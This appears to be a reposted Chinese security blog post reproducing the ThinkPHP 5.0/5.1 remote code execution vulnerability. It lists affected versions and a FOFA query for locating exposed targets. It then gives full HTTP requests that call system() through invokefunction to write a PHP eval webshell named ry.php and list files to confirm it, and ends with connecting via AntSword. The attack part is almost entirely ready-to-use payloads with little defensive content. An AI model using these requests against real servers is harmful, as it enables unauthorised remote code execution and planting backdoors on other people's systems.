本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-ThinkPHP 5.x 的 RCE
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架。该漏洞在5.0.x和5.1.x的版本中,由于路由对控制器名控制不严谨导致或者Request类对调用方法控制不严加上变量覆盖,从而导致远程代码执行漏洞。
0x03 漏洞复现
漏洞影响:ThinkPHP 5.0.5-5.0.22、ThinkPHP 5.1.0-5.1.30
FOFA:“thinphp”
1.url后缀加入/index.php/?s=ddd显示thinkphp版本为V5.0.20
http://x.x.x.x:8080/index.php/?s=ddd
2.写入一句话木马,回显错误500(一句话木马需要url编码)
GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(%5C$_POST%5B\'ry\'%5D)?%3E%22%20%3E%20ry.php HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: AuthSession=dnVsaHViOjYyNTUwNEU2OtrW5YMzoY_6lZb4NqGJ2xaCO80f; PHPSESSID=44e90136f8b96d9bde7aa0ec62dc9c1b
Upgrade-Insecure-Requests: 1
3.通过执行系统命令ls查看是否存在ry.php的webshell,如图写入成功
GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: AuthSession=dnVsaHViOjYyNTUwNEU2OtrW5YMzoY_6lZb4NqGJ2xaCO80f; PHPSESSID=44e90136f8b96d9bde7aa0ec62dc9c1b
Upgrade-Insecure-Requests: 1
4.蚁剑连接http://x.x.x.x:8080/ry.php,密码为ry,得到一个webshell
THE END
暂无评论内容